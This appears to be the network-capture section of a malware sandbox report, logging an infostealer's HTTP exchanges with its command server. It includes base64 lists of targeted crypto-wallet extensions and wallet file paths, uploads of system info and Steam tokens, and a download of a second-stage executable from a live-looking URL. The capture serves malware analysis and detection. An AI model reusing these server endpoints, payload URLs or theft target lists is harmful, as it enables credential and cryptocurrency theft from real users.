Oct 30, 2024 19:47:01.177028894 CET	952	IN	Data Raw: 4d 48 78 49 51 56 5a 42 53 43 42 58 59 57 78 73 5a 58 52 38 59 32 35 75 59 32 31 6b 61 47 70 68 59 33 42 72 62 57 70 74 61 32 4e 68 5a 6d 4e 6f 63 48 42 69 62 6e 42 75 61 47 52 74 62 32 35 38 4d 58 77 77 66 44 42 38 52 57 78 73 61 53 41 74 49 46 Data Ascii: MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8b2NqZHBtb2FsbG1nbWpiYm9nZmlpYW9mcGhiamdjaGh8MXwwfDB8VmVub20gV2FsbGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl
Oct 30, 2024 19:47:01.179101944 CET	467	OUT	POST /eaa194fa594ff9c2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHIDGDHCGCBAKFHIIIII Host: 45.91.200.39 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 47 44 48 43 47 43 42 41 4b 46 48 49 49 49 49 49 2d 2d 0d 0a Data Ascii: ------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------GHIDGDHCGCBAKFHIIIIIContent-Disposition: form-data; name="message"fplugins------GHIDGDHCGCBAKFHIIIII--
Oct 30, 2024 19:47:01.432435036 CET	335	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 18:47:01 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Oct 30, 2024 19:47:01.452884912 CET	200	OUT	POST /eaa194fa594ff9c2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFB Host: 45.91.200.39 Content-Length: 5199 Connection: Keep-Alive Cache-Control: no-cache
Oct 30, 2024 19:47:01.452927113 CET	5199	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Oct 30, 2024 19:47:02.064091921 CET	202	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 18:47:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 30, 2024 19:47:02.333699942 CET	91	OUT	GET /cb9cc10e175e1537/sqlite3.dll HTTP/1.1 Host: 45.91.200.39 Cache-Control: no-cache
Oct 30, 2024 19:47:02.568988085 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 18:47:02 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Oct 30, 2024 19:47:02.569039106 CET	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Oct 30, 2024 19:47:02.569076061 CET	1236	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Oct 30, 2024 19:47:06.569233894 CET	200	OUT	POST /eaa194fa594ff9c2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAA Host: 45.91.200.39 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Oct 30, 2024 19:47:06.872137070 CET	202	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 18:47:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 30, 2024 19:47:06.885951042 CET	562	OUT	POST /eaa194fa594ff9c2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIIECAAKECFHIECBKJDH Host: 45.91.200.39 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 43 41 41 4b 45 43 46 48 49 45 43 42 4b 4a 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIIECAAKECFHIECBKJDHContent-Disposition: form-data; name="file"------IIIECAAKECFHIECBKJDH--
Oct 30, 2024 19:47:07.148030996 CET	202	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 18:47:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 30, 2024 19:47:07.381558895 CET	466	OUT	POST /eaa194fa594ff9c2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JECGIIIDAKJDHJKFHIEB Host: 45.91.200.39 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 2d 2d 0d 0a Data Ascii: ------JECGIIIDAKJDHJKFHIEBContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------JECGIIIDAKJDHJKFHIEBContent-Disposition: form-data; name="message"wallets------JECGIIIDAKJDHJKFHIEB--
Oct 30, 2024 19:47:07.619817019 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 18:47:07 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 30, 2024 19:47:07.622453928 CET	464	OUT	POST /eaa194fa594ff9c2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKF Host: 45.91.200.39 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 2d 2d 0d 0a Data Ascii: ------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="message"files------HIJEGDBGDBFIJKECBAKF--
Oct 30, 2024 19:47:07.858901024 CET	202	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 18:47:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 30, 2024 19:47:07.874089956 CET	562	OUT	POST /eaa194fa594ff9c2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIEGHJEGHJKFIEBFHJK Host: 45.91.200.39 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="file"------CGIEGHJEGHJKFIEBFHJK--
Oct 30, 2024 19:47:08.111810923 CET	202	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 18:47:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 30, 2024 19:47:08.209654093 CET	202	OUT	POST /eaa194fa594ff9c2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDB Host: 45.91.200.39 Content-Length: 113023 Connection: Keep-Alive Cache-Control: no-cache
Oct 30, 2024 19:47:08.848954916 CET	202	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 18:47:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 30, 2024 19:47:09.079051018 CET	471	OUT	POST /eaa194fa594ff9c2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBFIIIEHCFHJKFHDHDA Host: 45.91.200.39 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 2d 2d 0d 0a Data Ascii: ------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="message"ybncbhylepme------JEBFIIIEHCFHJKFHDHDA--
Oct 30, 2024 19:47:09.316293001 CET	314	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 18:47:09 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 88 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 48 4d 36 4c 79 39 6e 62 33 4e 77 4c 6d 4e 73 61 57 35 70 59 32 46 32 5a 58 4a 30 61 57 64 6c 62 69 35 6a 62 32 30 76 64 47 31 77 63 43 39 6a 61 48 4a 76 62 57 56 66 4d 54 4d 78 4c 6d 56 34 5a 58 77 78 66 44 42 38 55 33 52 68 63 6e 52 38 4d 48 77 3d Data Ascii: aHR0cHM6Ly9nb3NwLmNsaW5pY2F2ZXJ0aWdlbi5jb20vdG1wcC9jaHJvbWVfMTMxLmV4ZXwxfDB8U3RhcnR8MHw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	45.91.200.39	80	6556	C:\Users\user\Desktop\b4s45TboUL.exe

Timestamp	Bytes transferred	Direction	Data
Oct 30, 2024 19:47:20.365736961 CET	471	OUT	POST /eaa194fa594ff9c2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECF Host: 45.91.200.39 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EHDAAECAEBKJKFHJKECF--
Oct 30, 2024 19:47:22.843914986 CET	203	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 18:47:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	87.106.236.48	443	6556	C:\Users\user\Desktop\b4s45TboUL.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 18:47:10 UTC	94	OUT	GET /tmpp/chrome_131.exe HTTP/1.1 Host: gosp.clinicavertigen.com Cache-Control: no-cache
2024-10-30 18:47:10 UTC	272	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 30 Oct 2024 18:47:10 GMT Content-Type: application/octet-stream Content-Length: 8662936 Last-Modified: Wed, 30 Oct 2024 13:44:38 GMT Connection: close ETag: "67223846-842f98" X-Powered-By: PleskLin Accept-Ranges: bytes
2024-10-30 18:47:10 UTC	16112	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0e 00 db 86 21 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 10 01 00 00 a2 6c 00 00 00 00 00 58 e0 c5 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 f7 00 00 04 00 00 7a 7a 84 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd!g"lX@zz`
